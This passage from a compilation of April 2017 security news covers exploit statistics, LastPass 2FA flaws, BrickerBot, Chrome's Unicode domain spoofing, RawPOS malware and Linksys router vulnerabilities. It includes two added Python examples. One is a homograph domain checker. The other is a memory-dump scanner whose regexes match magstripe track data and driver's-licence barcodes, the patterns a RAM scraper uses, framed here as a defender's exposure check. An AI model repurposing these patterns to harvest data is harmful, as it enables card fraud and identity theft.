In addition to biometric cards, MasterCard is also planning to bring contactless payments, which should function similar to mobile payments like Apple Pay where users authenticate themselves via fingerprint while holding their smartphones against the terminal.
Corporate Users Increasingly Targeted With Exploits: Kaspersky
21.4.2017 securityweek Exploit
A report published by Kaspersky Lab on Thursday shows that the number of attacks involving exploits increased significantly in 2016 compared to the previous year, but the number of attacked users actually dropped.
The security firm observed more than 700 million attempts to execute an exploit in 2016, which represents a 25% increase compared to 2015. However, the number of users attacked was only 4.3 million, compared to nearly 5.5 million in the previous year.
This indicates that while fewer users encountered exploits, the likelihood of coming across an exploit increased as the number of websites and spam messages delivering such threats has continued to grow.
Of all the exploit attacks observed by Kaspersky in 2016, more than 15% were aimed at corporate machines. The number of targeted corporate users increased from 538,000 in 2015 to 690,000 in 2016.
While Windows and web browsers were the most targeted applications in both 2015 and 2016, their share decreased significantly last year, making more room for Android and Microsoft Office exploits.
“Exploits for vulnerabilities in Office software became the absolute champions in terms of the number of attacked users. They increased by almost 103% to reach 367,167 attacked users,” Kaspersky said in its report.
The security firm said more than 297,000 users were hit by zero-day or heavily obfuscated known exploits in 2016, and the most common exploit, same as in the previous year, was CVE-2010-2568, a vulnerability leveraged by the notorious Stuxnet malware.
Between 2010 and 2016, malicious actors used more than 80 vulnerabilities in targeted attacks. The Russia-linked threat group known as APT28 and Fancy Bear leveraged 25 flaws, including at least six zero-days, followed by the NSA-linked Equation Group, which used roughly 17 vulnerabilities, including at least eight zero-days.
Groups that launched targeted attacks have mainly relied on Windows flaws, followed by Flash Player, Office, Java and Internet Explorer. The most popular vulnerability is CVE-2012-0158, which is still being used by APT actors.
The Stuxnet vulnerability is still one of the most exploited flaws in the wild by hackers
21.4.2017 securityaffairs CyberWar
A new report published by Kaspersky confirms that the Stuxnet exploit targeting a Windows Shell vulnerability is still widely used by threat actors.
The case that I’m going to present to you demonstrates the importance of patch management and shows the effects of the militarization of cyberspace.
Unpatched software is an easy target for hackers that can exploit old vulnerabilities to compromise the systems running them. Let’s consider for example the exploit code used in the notorious Stuxnet cyber weapon that hit the centrifuges at the Iranian nuclear plant at Natanz.
The flaw exploited by the Stuxnet worm was first patched by Microsoft in 2010, but threat actors in the wild continue to exploit it in a huge number of cyber attacks.
According to Kaspersky Lab, the flaw used by Stuxnet to target Windows machines, tracked as CVE-2010-2568 has been weaponized to remotely execute code on unpatched Windows computers.
The dangerous trend continues, in August 2014 experts from Kaspersky revealed that in the period between November 2013 and June 2014, the Windows Shell vulnerability (CVE-2010-2568) exploited by Stuxnet was detected 50 million times targeting nearly 19 million machines all over the world.
In 2015 and in 2016, roughly one in four Kaspersky users was targeted by exploit code leveraging CVE-2010-2568.
“To take just one example, when we looked at our most recent threat statistics we found that exploits to CVE-2010-2568 (used in the notorious Stuxnet campaign) still rank first in terms of the number of users attacked. Almost a quarter of all users who encountered any exploit threat in 2016 were attacked with exploits to this vulnerability.” states a report published by Kaspersky.
Of course, the CVE-2010-2568 vulnerability only affects very old operating systems, including Windows XP and Windows Server 2008, and unpatched versions of Windows 7.
Attackers mostly used the Stuxnet exploit code to create malicious code that can “self-replicate” across a targeted network.
In conclusion, the militarization of cyberspace has serious consequences for Internet users, even when the malware was spread many years ago.
I suggest reading the research published by Kaspersky, which provides interesting data on the most exploited vulnerabilities and the threat actors leveraging them.
Arrest of WikiLeaks's Assange a 'Priority': US Top Cop
21.4.2017 securityweek BigBrothers
The arrest of WikiLeaks founder Julian Assange is a US "priority," Attorney General Jeff Sessions said Thursday, as media reports indicated his office was preparing charges against the fugitive anti-hero.
"We are going to step up our effort and already are stepping up our efforts on all leaks," Sessions, America's top cop, said at a news conference in response to a reporter's question about a US priority to arrest Assange.
The Justice Department chief said a rash of leaks of sensitive secrets appeared unprecedented.
"This is a matter that's gone beyond anything I'm aware of. We have professionals that have been in the security business of the United States for many years that are shocked by the number of leaks and some of them are quite serious," he said.
"Whenever a case can be made, we will seek to put some people in jail."
Prosecutors in recent weeks have been drafting a memo that looks at charges against Assange and members of WikiLeaks that possibly include conspiracy, theft of government property and violations of the Espionage Act, the Washington Post reported, citing unnamed US officials familiar with the matter.
Several other media outlets also cited unnamed officials as saying US authorities were preparing charges against Assange. The Justice Department declined to comment on the reports.
Assange, 45, has been holed up at the Ecuadoran embassy in London since 2012 trying to avoid extradition to Sweden where he faces a rape allegation that he denies.
He fears Sweden would extradite him to the United States to face trial for leaking hundreds of thousands of secret US military and diplomatic documents that first gained attention in 2010.
Assange's case returned to the spotlight after WikiLeaks was accused of meddling in the US election last year by releasing a damaging trove of hacked emails from presidential candidate Hillary Clinton's campaign and the Democratic party.
US officials say the emails were hacked with the aid of the Russian government in its bid to influence the US election.
Critics say their release late in the race helped to tip the November 8 election to Republican Donald Trump.
Trump and his administration have put heat on WikiLeaks after it embarrassed the Central Intelligence Agency last month by releasing a large number of files and computer code from the spy agency's top-secret hacking operations.
The documents showed how the CIA exploits vulnerabilities in popular computer and networking hardware and software to gather intelligence.
Supporters of WikiLeaks say it's practicing the constitutional right of freedom of speech and the press.
- 'Hostile intelligence service' -
CIA Director Mike Pompeo last week branded WikiLeaks a "hostile intelligence service," saying it threatens democratic nations and joins hands with dictators.
Pompeo focused on the anti-secrecy group and other leakers of classified information like Edward Snowden as one of the key threats facing the United States.
"WikiLeaks walks like a hostile intelligence service and talks like a hostile intelligence service. It has encouraged its followers to find jobs at CIA in order to obtain intelligence... And it overwhelmingly focuses on the United States, while seeking support from anti-democratic countries and organizations," said Pompeo.
"It is time to call out WikiLeaks for what it really is -- a non-state hostile intelligence service often abetted by state actors like Russia."
The day before Pompeo spoke, Assange published an opinion piece in The Washington Post in which he said his group's mission was the same as America's most respected newspapers: "to publish newsworthy content."
"WikiLeaks's sole interest is expressing constitutionally protected truths," he said, professing "overwhelming admiration for both America and the idea of America."
Flaws Allowed Hackers to Bypass LastPass 2FA
21.4.2017 securityweek Vulnerebility
Design flaws in LastPass’ implementation of two-factor authentication (2FA) could have been exploited by hackers to bypass the protection mechanism and gain access to user accounts.
Martin Vigo, one of the Salesforce researchers who in November 2015 reported finding several vulnerabilities in LastPass, has once again analyzed the popular password manager, particularly its 2FA mechanism.
The temporary 2FA codes are generated based on several variables, including a secret seed which is typically encoded in a QR code that the user scans with a 2FA app such as Google Authenticator.
Vigo’s tests showed that the request made when a QR code image was displayed to the user contained the login hash used by LastPass for authentication. In fact, the 2FA secret seed had been derived from the user’s password, which defeated the entire purpose of 2FA protection as the attacker presumably already possesses the password.
While determining the URL of the QR code was not difficult, a hacker needed to be authenticated for the attack to work. However, exploiting a cross-site request forgery (CSRF) vulnerability could address this problem. Getting a logged-in user to click on a specially crafted link that exploits a CSRF flaw could have allowed an attacker to obtain the QR code image.
According to Vigo, an attacker could have also leveraged cross-site scripting (XSS) vulnerabilities on popular websites to avoid having the victim visit his malicious site, which would be more likely to raise suspicion.
The researcher also found a simple way to disable 2FA using a CSRF vulnerability. As with all CSRF attacks, the hacker needed to get the victim to visit a malicious website.
LastPass was informed about these vulnerabilities on February 7 and immediately started working on patches. The company addressed the CSRF flaws, added a security mechanism for checking the origin of a QR code request, and eliminated the use of password hashes for the secret seed.
In a blog post published on Thursday, LastPass informed users that they don’t need to take any action as all the fixes have been done on the server side. The company also pointed out that exploiting the flaws required a combination of factors that made attacks more difficult.
“To exploit this issue an attacker would have needed to take several steps to bypass Google Authenticator,” LastPass said. “First, the attacker would have had to lure a user to a nefarious website. Second, the user would have to be logged in to LastPass at the time of visiting the malicious site.”
Vigo’s disclosure comes shortly after Google Project Zero researcher Tavis Ormandy reported finding several vulnerabilities in the LastPass browser extensions.
ICS-CERT Warns of BrickerBot's IoT Device Damaging Capabilities
21.4.2017 securityweek BotNet
The Department of Homeland Security’s Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) has issued an alert on BrickerBot, a piece of malware designed to permanently disable Internet of Things (IoT) devices.
Discovered earlier this month, the malware is capable of what Radware researchers call Permanent Denial-of-Service (PDoS). Two versions of the malware were observed to date, both featuring the same capabilities: they can damage the compromised devices’ firmware and disable basic functions.
Citing the Radware report, ICS-CERT warns that one version of BrickerBot is targeting devices running BusyBox that have an exposed Telnet command window, and which also have SSH exposed through an older version of Dropbear SSH server. Identified as Ubiquiti network devices, most of these run outdated firmware, while some are access points or bridges with beam directivity.
The second malware variant targets Linux-based devices, both with and without BusyBox, that expose a Telnet service protected only by default or hard-coded passwords. This variant also uses Tor exit nodes to hide the source of the attack, ICS-CERT’s alert points out.
While BrickerBot.1 was active for only about a week, between March 20 and March 25, BrickerBot.2 continues to operate. What is not yet known, however, is what type of devices are used to launch these attacks, or how many of them there are.
In a new announcement, Radware reveals that the IP camera they tested the discovered malware on stopped working completely, and that a factory reset didn’t restore functionality. The security firm also notes that users might not even be aware of the malware attack, and could simply believe they bought faulty hardware.
ICS-CERT says it is working on identifying vendors of affected devices and on collecting detailed mitigation information. Until that happens, however, users can take some steps to protect their devices, such as changing the default credentials, disabling Telnet access to the device, and setting intrusion protection systems to block Telnet default credentials or reset Telnet connections.
These steps should keep devices protected from other threats as well, including Mirai, the distributed denial of service botnet that has been wreaking havoc among insecure IoT devices for more than half a year.
Users can also use network behavioral analysis to detect anomalies in traffic, along with automatic signature generation for protection. Ubiquiti Networks device owners are also advised to update to the latest firmware. Using strong passwords and disabling or renaming default system accounts should also help improve protection.
“ICS-CERT strongly encourages asset owners not to assume that their control systems are deployed securely or that they are not operating with an Internet accessible configuration. Instead, asset owners should thoroughly audit their networks for Internet facing devices, weak authentication methods, and component vulnerabilities. Control systems often have Internet accessible devices installed without the owner’s knowledge, putting those systems at increased risk of attack,” ICS-CERT’s alert reads.
The fact that new malware targeting IoT devices can permanently disable them shouldn’t come as a surprise, Bill Diotte, CEO, Mocana Corporation, told SecurityWeek in an emailed statement.
“IoT designers and manufacturers must start presuming that their devices will be subject to attack the minute they are connected to the Internet. The industry needs to make security as high a priority as performance and free overnight shipping,” Diotte said.
Chrome Addresses Threat of Unicode Domain Spoofing
21.4.2017 securityweek Phishing
Chrome 58 Resolves Unicode Domain Spoofing
Google on Wednesday released Chrome 58 to the stable channel for Windows, Mac and Linux to address 29 vulnerabilities, including an issue that rendered users vulnerable to Unicode domain phishing.
Demonstrated by web developer Xudong Zheng, the bug resides in the use of Unicode characters in Internet hostnames through Punycode. By using characters that may look the same but are represented differently in Punycode, malicious actors can spoof legitimate websites and use them in phishing attacks.
The issue was also demonstrated by Avanan researchers in December 2016, when they stumbled upon live phishing attacks targeting Office 365 business email users. Using Unicode characters, attackers could create a site looking like http://www.pаypal.com/, but which actually resolved to http://www.xn--pypal-4ve.com/, thus bypassing Office 365’s anti-phishing defenses, the researchers explained.
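The following is an added Python example, not code from Chrome, Avanan or Xudong Zheng. It shows the Punycode (xn--) form that a resolver actually looks up for a Unicode hostname, and implements the kind of check a mail gateway or browser can apply: flag a label that mixes scripts, or that collapses onto a protected brand name once common Latin/Cyrillic look-alikes are folded together. The confusables map is a hand-picked subset, not the full Unicode table:

```python
"""Added example, not Chrome's or Avanan's code: IDNA/Punycode conversion plus a
simple homograph check. Standard library only."""
import unicodedata

# Cyrillic letters that render identically to Latin ones in most fonts. This is a
# hand-picked subset of the Unicode confusables data, not the complete table.
CONFUSABLES = {
    "\u0430": "a",  # CYRILLIC SMALL LETTER A
    "\u0435": "e",  # CYRILLIC SMALL LETTER IE
    "\u043e": "o",  # CYRILLIC SMALL LETTER O
    "\u0440": "p",  # CYRILLIC SMALL LETTER ER
    "\u0441": "c",  # CYRILLIC SMALL LETTER ES
    "\u0443": "y",  # CYRILLIC SMALL LETTER U
    "\u0445": "x",  # CYRILLIC SMALL LETTER HA
    "\u0456": "i",  # CYRILLIC SMALL LETTER BYELORUSSIAN-UKRAINIAN I
    "\u0458": "j",  # CYRILLIC SMALL LETTER JE
    "\u04bb": "h",  # CYRILLIC SMALL LETTER SHHA
}


def to_punycode(host: str) -> str:
    """ASCII-compatible (IDNA) form, e.g. 'www.p\u0430ypal.com' -> 'www.xn--pypal-4ve.com'."""
    return host.encode("idna").decode("ascii")


def from_punycode(host: str) -> str:
    """Inverse: decode xn-- labels back to Unicode for inspection."""
    return host.encode("ascii").decode("idna")


def skeleton(label: str) -> str:
    """Fold look-alikes to their Latin twins so the two spellings of 'paypal' compare equal."""
    return "".join(CONFUSABLES.get(ch, ch) for ch in label.lower())


def scripts_in(label: str) -> set:
    """Unicode scripts of the letters in a label, taken from the character names."""
    return {unicodedata.name(ch).split(" ")[0] for ch in label if ch.isalpha()}


def homograph_verdict(host: str, protected_brands) -> dict:
    """Per-label check: a label that mixes scripts, or whose skeleton equals a
    protected brand while the label itself is not plain ASCII, is suspicious."""
    brands = {b.lower() for b in protected_brands}
    unicode_host = from_punycode(host) if "xn--" in host.lower() else host
    reasons = []
    for label in unicode_host.split("."):
        if label.isascii():
            continue  # plain ASCII labels cannot be homographs
        if len(scripts_in(label)) > 1:
            reasons.append(f"{label!r}: mixed scripts {sorted(scripts_in(label))}")
        if skeleton(label) in brands:
            reasons.append(f"{label!r}: look-alike of protected brand {skeleton(label)!r}")
    return {
        "host": unicode_host,
        "ascii": to_punycode(unicode_host),
        "suspicious": bool(reasons),
        "reasons": reasons,
    }


if __name__ == "__main__":
    for h in ("www.paypal.com", "www.p\u0430ypal.com", "\u0443\u0430\u04bb\u043e\u043e.com"):
        print(homograph_verdict(h, {"paypal", "yahoo"}))
```

Note that the mixed-script test alone is not enough: a label written entirely in Cyrillic (the constructed `уаһоо.com` above) passes it, which is why the skeleton comparison against a brand list is the check that matters.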
Chrome 58 addresses the bug, which Google refers to as a URL spoofing in Omnibox (CVE-2017-5060). Rated only Medium severity, the vulnerability earned Xudong Zheng a $2000 bounty.
Two other Medium risk URL spoofing in Omnibox flaws were addressed as well: CVE-2017-5061, discovered by Haosheng Wang (awarded $2000), and CVE-2017-5067, credited to Khalil Zhani (awarded $500).
Only 12 of the 29 security fixes in Chrome 58 were for flaws discovered by external researchers: three rated High severity, eight Medium risk, and one Low severity.
The High risk flaws include a Type confusion in PDFium (CVE-2017-5057), found by Guang Gong of Alpha Team, Qihoo 360 ($3000); a Heap use after free in Print Preview (CVE-2017-5058), discovered by Khalil Zhani ($2000); and a Type confusion in Blink (CVE-2017-5059), credited to SkyLined working with Trend Micro's Zero Day Initiative.
The Medium severity bugs also included a Use after free in Chrome Apps (CVE-2017-5062), a Heap overflow in Skia (CVE-2017-5063), a Use after free in Blink (CVE-2017-5064), Incorrect UI in Blink (CVE-2017-5065), and Incorrect signature handling in Networking (CVE-2017-5066).
The Low severity vulnerability was a Cross-origin bypass in Blink tracked as CVE-2017-5069 and was discovered by Michael Reizelman.
RawPOS Malware Steals Driver's License Information
21.4.2017 securityweek Virus
The RawPOS Point-of-Sale (PoS) RAM scraper malware was recently observed stealing driver’s license information from victims, Trend Micro has discovered.
RawPOS is one of the oldest PoS malware families out there, with patterns matching its activity dating as far back as 2008. Over time, the actors behind it have focused mainly on the hospitality industry, and have been using the same malware components and tools for lateral movement.
These actors have since started gathering additional information from the compromised systems, which put victims at greater risk of identity theft, researchers warn. The driver’s license information stolen by the malware can be used by cybercriminals in their malicious activities.
RawPOS, Trend Micro explains, attempts to gather both credit card mag stripe data and other types of valuable information in a single sweep, while modifying the regex string to capture the needed data. The malware scans processes to find “track data”-like strings in memory. It then dumps process memory for a file scraper to organize the data.
The threat used almost the same pattern matching for the first eight years, but changed it in 2016 to start looking for “drivers” and “license” strings, as well as for an “ANSI 636” string. This is a mandatory PDF417 bar code to aid in “identity and age verification, automation of administrative processing, and address verification,” as defined in the 2013 North American AAMVA DL/ID Card Design Standard.
Because the numbers “636” are the initial digits of the Issuer Identification Number (IIN) for most US states, the security researchers concluded that the actors were interested in driver’s license information within the US.
“The Information stored in each license varies per state, but the bar code mostly contains the same information present in each individual driver’s license or state ID – specifically: full name, date of birth, full address, gender, height, even hair and eye color,” Trend Micro says.
The use of this barcode isn’t unheard of, although it is less common than credit card swipes, the security researchers explain. The driver’s license barcode could get scanned in pharmacies, retail shops, bars, casinos and other establishments that require it.
The use of personal information next to the stolen credit card details provides threat actors with a more “authentic” identity, while also allowing them to complete a transaction even if they don’t have the physical card.
“Aside from this, the driver’s license bar code swipe of the victims can also be used for other kinds of misrepresentation, such as identity theft. In any case, stolen Personal Identity Information (PII) will always be a serious issue that can lead to dire consequences for its victims,” the security researchers explain.
Anatomy of Cybercriminal Communications: Why do crooks prefer Skype
21.4.2017 securityaffairs CyberCrime
Security firm Flashpoint published an interesting paper titled ‘Cybercrime Economy: An Analysis of Cybercriminal Communication Strategies’ about the communication strategies of cybercriminal threat actors.
The research by the threat intelligence firm Flashpoint has uncovered how malicious threat actors communicate to share information among themselves.
The research found that there is a growing economy around cybercriminal communications: more than just information sharing, it has formed an ecosystem in which failures, successes, and the planning and procedures used to beat organizations’ countermeasures are shared, together with the planning of attacks.
The research points out that cybercriminal communications rely on a variety of software alongside access to communities on the deep and dark web. This is done in order to organize across domains for crimes such as phishing, credit card fraud, spam, and every sort of attack that passes through corporations’ filters and defenses.
One reason for using this software to communicate is to make it difficult for law enforcement agencies to track the activities in the communities’ forums, and to give users privacy, since most of these programs have cryptographic functions or protocols at their core. The software also allows a user to enter random or even fraudulent information about themselves, which makes detection even more difficult.
Another reason is the payment required to maintain a forum, which in many cases can be a difficulty for cybercriminals. Communications programs are free of charge and anyone can download them.
The study was carried out by monitoring underground communities where users often invited other members to discuss their plans outside the underground forum. Eighty instant messaging applications and protocols were analyzed, of which at least five were the most used.
These applications implement privacy features, such as PGP encryption. Users’ secure communications make it difficult for authorities to gain access to the content shared between users without knowing the encryption key that was used for the session.
The programs most used by cybercriminals are ICQ, Skype, Jabber, Quiet Internet Pager, Pretty Good Privacy, Pidgin, PSI and AOL Instant Messenger (AIM).
The report shows that the use of cybercriminal communications differs among communities of different languages; below are the “Language Group Specific Findings”. For Russian-speaking communities the situation is as follows:
1. Jabber (28.3%)
2. Skype (24.26%)
3. ICQ (18.74%)
4. Telegram (16.39%)
5. WhatsApp (3.93%)
6. PGP (3.79%)
7. Viber (3.01%)
8. Signal (1.58%)
For Chinese-speaking communities the distribution in 2016 was:
1. QQ (63.33%)
2. WeChat (35.58%)
3. Skype (0.44%)
4. WhatsApp (0.22%)
5. Jabber (0.31%)
6. PGP (0.13%)
7. ICQ (0.1%)
8. AOL Instant Messenger (0.08%)
“Cybercriminals can choose from a wide variety of platforms to conduct their peer-to-peer (P2P) communications.” states the report. “This choice is typically influenced by a combination of factors, which can include:
Ease of use
Country and/or Language
Security and/or anonymity concerns
Sources:
http://www.securityweek.com/many-cybercriminals-prefer-skype-communications-study
http://www.ibtimes.co.uk/skype-whatsapp-how-cybercriminals-share-hacking-tips-tricks-online-1617822
http://www.itnews.com/article/3190830/security/report-cybercriminals-prefer-skype-jabber-and-icq.html
http://www.infoworld.com/article/3190563/encryption/cybercriminals-prefer-to-chat-over-skype.html
https://www.flashpoint-intel.com/blog/cybercrime/cybercriminal-communication-strategies/
Vulnerabilities in Linksys routers allow attackers to hijack dozens of models
21.4.2017 securityaffairs Vulnerebility
Cyber security experts disclosed the existence of 10 unpatched security flaws in dozens of Linksys routers widely used today.
The IOActive senior security consultant Tao Sauvage and the independent security researcher Antide Petit have reported more than a dozen of unpatched security vulnerabilities affecting 25 different Linksys Smart Wi-Fi Routers models.
The security duo published a blog post on Wednesday providing details of their discoveries. Attackers can exploit the security vulnerabilities to extract sensitive information from the devices, trigger DoS conditions, change settings, and completely take them over. The vulnerabilities affect dozens of Linksys models, including the EA3500 Linksys Smart Wi-Fi, WRT and Wireless-AC series.
Out of 10 security vulnerabilities, six issues can be exploited by remote unauthenticated attackers.
All these products are widely used by private users and small businesses, so the impact of the discovery is huge. It has been estimated that over 7,000 routers that have their web-based administrative interfaces exposed to the Internet are exposed to attacks.
The experts determined that 11 percent of the 7,000 Linksys routers still used default credentials.
“We performed a mass-scan of the ~7,000 devices to identify the affected models. In addition, we tweaked our scan to find how many devices would be vulnerable to the OS command injection that requires the attacker to be authenticated. We leveraged a router API to determine if the router was using default credentials without having to actually authenticate.” reads the blog post published by the two experts.
“We found that 11% of the ~7000 exposed devices were using default credentials and therefore could be rooted by attackers.”
Most of the flawed Linksys routers (~69%) are located in the USA, followed by Canada (~10%), Hong Kong (~1.8%), Chile (~1.5%), and the Netherlands (~1.4%).
If we consider the possibility that a local attacker exploits the issues to target systems over a local area network, the number of devices at risk dramatically increases.
The experts did not provide technical details about the flaws in the Linksys routers, to avoid mass attacks against the vulnerable devices. The duo confirmed that two of the flaws could be exploited to trigger a denial-of-service condition on flawed routers, making them unusable or forcing them to reboot, by sending specifically crafted requests to a specific API.
Other vulnerabilities affecting the web interfaces of the Linksys routers allow attackers to bypass authentication and access many CGI scripts that can reveal sensitive information about the flawed devices and their configurations. An attacker can exploit the issues to obtain the Wi-Fi Protected Setup (WPS) PIN and to access the wireless network for further lateral movement from within. An attacker can exploit the vulnerability to determine firmware and kernel versions of the vulnerable Linksys routers and obtain a list of running processes, information about computers connected to the routers, a list of USB devices and the configuration settings for the FTP and SMB file-sharing servers.
The most severe flaw discovered by the experts could be exploited by attackers to inject and execute shell commands with root privileges on the affected routers. The flaw could be exploited to set up a backdoor administrative account that wouldn’t be listed in the web interface.
“Finally, authenticated attackers can inject and execute commands on the operating system of the router with root privileges. One possible action for the attacker is to create backdoor accounts and gain persistent access to the router. Backdoor accounts would not be shown on the web admin interface and could not be removed using the Admin account.” states the post.
The flaw requires authentication to be exploited, which means the attackers need access to an existing account.
“It should be noted that we did not find a way to bypass the authentication protecting the vulnerable API; this authentication is different than the authentication protecting the CGI scripts.”
Linksys confirmed it is currently working on firmware updates to fix the vulnerabilities; in the meantime, as a mitigation measure, it suggests users disable the guest Wi-Fi network feature on their routers.
“Linksys was recently notified of some vulnerabilities in our Linksys Smart Wi-Fi series of routers.
As we work towards publishing firmware updates, as a temporary fix, we recommend that customers using Guest Networks on any of the affected products below temporarily disable this feature to avoid any attempts at malicious activity.” states the advisory. “We will be releasing firmware updates for all affected devices.”
The complete list of vulnerable Linksys routers is reported in the security advisory issued by the company.
The RawPOS PoS Malware also scans for driver’s license data
21.4.2017 securityaffairs Virus
According to Trend Micro, the RawPOS PoS malware was recently used to steal driver’s license information from victims.
Security experts at Trend Micro have spotted a new variant of the RawPOS PoS malware stealing driver’s license information from victims.
The RawPOS PoS malware is an old threat that has been active since 2008. RawPOS is a memory scraper that has infected lodging merchants since 2008 by targeting the process memory where payment information may be temporarily stored; the stolen data is staged on the network and later removed by a separate process.
The malicious code was mainly used against targets in the hospitality industry; over time, crooks have also used it to steal additional information from victims.
Back to the present, crooks steal driver’s license information for several fraudulent activities. According to Trend Micro, the version of the RawPOS PoS malware recently spotted attempts to gather both credit card mag stripe data and other valuable information in a single sweep.
“Traditionally, PoS threats look for credit card mag stripe data and use other components such as keyloggers and backdoors to get other valuable information. RawPOS attempts to gather both in one go, cleverly modifying the regex string to capture the needed data.” reads the analysis published by TrendMicro.
The RawPOS PoS malware uses regular expressions to scan processes for strings that look like data stored in the magnetic stripe in order to find “track data”-like strings in memory.
The analysis of the regular expressions used by the threat demonstrates that starting from 2016 the malware scans memory for “drivers” and “license” strings, as well as for an “ANSI 636” string (“636” are the initial digits of the Issuer Identification Number (IIN) for most US states).
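The description above (and in the earlier RawPOS article on this page) of scanning process memory for “track data”-like strings and for the “ANSI 636” barcode header is exactly what a defender can do to measure their own exposure: if a POS process dump contains these strings in plaintext, a scraper will find them too. The following Python is an added example, not Trend Micro’s analysis code or anything from RawPOS; it scans a constructed byte buffer for Track 1/Track 2 magstripe records (Luhn-checked to suppress false positives) and for AAMVA DL/ID barcode payloads, and returns masked findings. The sample buffer uses the well-known 4111… test card number and a placeholder IIN of 636000, which is not a real jurisdiction:

```python
"""Added example, not Trend Micro's or RawPOS code: a defender-side exposure check
that scans a memory dump (or any byte buffer) for the plaintext a RAM scraper
harvests: magstripe track data and AAMVA driver's-licence barcode payloads.
Findings are returned with the PAN masked. The sample buffer is constructed."""
import re

# Track 2 as written on the magstripe: ;PAN=YYMMSSS<discretionary>?  (PAN 13-19 digits,
# YYMM expiry, 3-digit service code, '?' end sentinel).
TRACK2_RE = re.compile(rb";(\d{13,19})=(\d{2})(\d{2})(\d{3})[0-9]*\?")
# Track 1: %B<PAN>^<NAME>^YYMMSSS<discretionary>?
TRACK1_RE = re.compile(rb"%B(\d{13,19})\^([A-Z /.'-]{2,26})\^(\d{2})(\d{2})(\d{3})[^?]*\?")
# AAMVA DL/ID barcode header: '@', LF, RS, CR, 'ANSI ', then the 6-digit IIN.
# US jurisdictions' IINs begin with 636, which is why the malware keys on 'ANSI 636'.
AAMVA_RE = re.compile(rb"@\n\x1e\rANSI (636\d{3})")


def luhn_ok(pan: bytes) -> bool:
    """Luhn mod-10 check to discard digit runs that merely look like a card number."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = ch - 48                     # ASCII digit -> int
        if i % 2 == 1:                  # double every second digit from the right
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def mask_pan(pan: bytes) -> str:
    """Keep only the first six and last four digits, as PCI masking rules require."""
    return pan[:6].decode() + "*" * (len(pan) - 10) + pan[-4:].decode()


def scan_dump(buf: bytes) -> dict:
    """Return masked findings: what a scraper would have found in this buffer."""
    findings = {"track1": [], "track2": [], "aamva": []}
    for m in TRACK1_RE.finditer(buf):
        if luhn_ok(m.group(1)):
            findings["track1"].append({"offset": m.start(), "pan": mask_pan(m.group(1)),
                                       "expiry": f"{m.group(3).decode()}/{m.group(4).decode()}"})
    for m in TRACK2_RE.finditer(buf):
        if luhn_ok(m.group(1)):
            findings["track2"].append({"offset": m.start(), "pan": mask_pan(m.group(1)),
                                       "expiry": f"{m.group(2).decode()}/{m.group(3).decode()}"})
    for m in AAMVA_RE.finditer(buf):
        findings["aamva"].append({"offset": m.start(), "iin": m.group(1).decode()})
    return findings


# Constructed buffer: filler, one Track 2 record using the well-known 4111... test PAN,
# a Luhn-invalid decoy that must be ignored, and an AAMVA header with the placeholder
# IIN 636000 (not a real jurisdiction) followed by made-up subfile bytes.
SAMPLE_DUMP = (
    b"\x00" * 32 + b"POS receipt #1234 "
    + b";4111111111111111=25121011234567890?" + b"\x00" * 8
    + b";4111111111111112=25121011234567890?"
    + b"@\n\x1e\rANSI 636000080102DL00410278ZC03190051DLDAQD12345678\nDCSDOE\n"
    + b"\xff" * 16
)

if __name__ == "__main__":
    for kind, items in scan_dump(SAMPLE_DUMP).items():
        for item in items:
            print(kind, item)
```

Run against a real process dump (for example, the output of a memory acquisition tool on a test POS terminal), a non-empty result means the terminal is holding track or ID data in a form a scraper can read, and the fix is point-to-point encryption or tokenization before the data reaches application memory, not a better antivirus signature.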
Crooks behind the last variant of the PoS malware were interested in driver’s license information belonging to US citizens.
“The Information stored in each license varies per state, but the bar code mostly contains the same information present in each individual driver’s license or state ID – specifically: full name, date of birth, full address, gender, height, even hair and eye color,” continues Trend Micro.
Researchers explained that driver’s license barcode could get scanned in many commercial activities, including pharmacies, retail shops, bars, and casinos.
The availability of personal information along with credit card data provides threat actors with a more “authentic” identity.
“Combining personal information with credit card information gives threat actors a more ‘authentic’ identity, and also provides all the information necessary to complete a transaction despite the lack of a physical card,” concluded Trend Micro. “Aside from this, the driver’s license bar code swipe of the victims can also be used for other kinds of misrepresentation, such as identity theft.”
Beware! Dozens of Linksys Wi-Fi Router Models Vulnerable to Multiple Flaws
20.4.2017 thehackernews Vulnerebility
Bad news for consumers with Linksys routers: Cybersecurity researchers have disclosed the existence of nearly a dozen unpatched security flaws in Linksys routers, affecting 25 different Linksys Smart Wi-Fi Router models widely used today.
IOActive's senior security consultant Tao Sauvage and independent security researcher Antide Petit published a blog post on Wednesday, revealing that they discovered 10 bugs late last year in 25 different Linksys router models.
Out of 10 security issues (ranging from moderate to critical), six can be exploited remotely by unauthenticated attackers.
According to the researchers, when exploited, the flaws could allow an attacker to overload the router, force a reboot by creating DoS conditions, deny legitimate user access, leak sensitive data, change restricted settings and even plant backdoors.
Many of the active Linksys devices exposed on the internet scanned by Shodan were using default credentials, making them susceptible to the takeover.
Researchers found more than 7,000 devices impacted by the security flaws at the time of the scan, though this does not include routers protected by firewalls or other network protections.
"We performed a mass-scan of the ~7,000 devices to identify the affected models," IOActive says. "We found that 11% of the ~7000 exposed devices were using default credentials and therefore could be rooted by attackers."
IOActive made Linksys aware of the issues in January this year and is working "closely and cooperatively" with the company ever since to validate and address the vulnerabilities.
Here's How Critical These Flaws Are:
The researchers did not reveal more details about the vulnerabilities until the patch is made available to users, although they said two of the flaws could be used for denial-of-service attacks on routers, making them unresponsive or reboot by sending fraudulent requests to a specific API.
Other flaws could allow attackers to bypass authentication on CGI scripts and collect sensitive data such as firmware versions, Linux kernel versions, running processes, connected USB devices, Wi-Fi WPS pins, firewall configurations, FTP settings, and SMB server settings.
CGI, or Common Gateway Interface, is a standard protocol which tells the web server how to pass data to and from an application.
Researchers also warned that attackers who have managed to authenticate to the devices can inject and execute malicious code on the device's operating system with root privileges.
With these capabilities in hand, attackers can create backdoor accounts for persistent access that are invisible even in the router's smart management console, and therefore to legitimate administrators.
However, researchers did not find an authentication bypass that can allow an attacker to exploit this flaw.
List of Vulnerable Linksys Router Models:
Here's the list of Linksys router models affected by the flaws:
EA2700, EA2750, EA3500, EA4500v3, EA6100, EA6200, EA6300, EA6350v2, EA6350v3, EA6400, EA6500, EA6700, EA6900, EA7300, EA7400, EA7500, EA8300, EA8500, EA9200, EA9400, EA9500, WRT1200AC, WRT1900AC, WRT1900ACS, and WRT3200ACM.
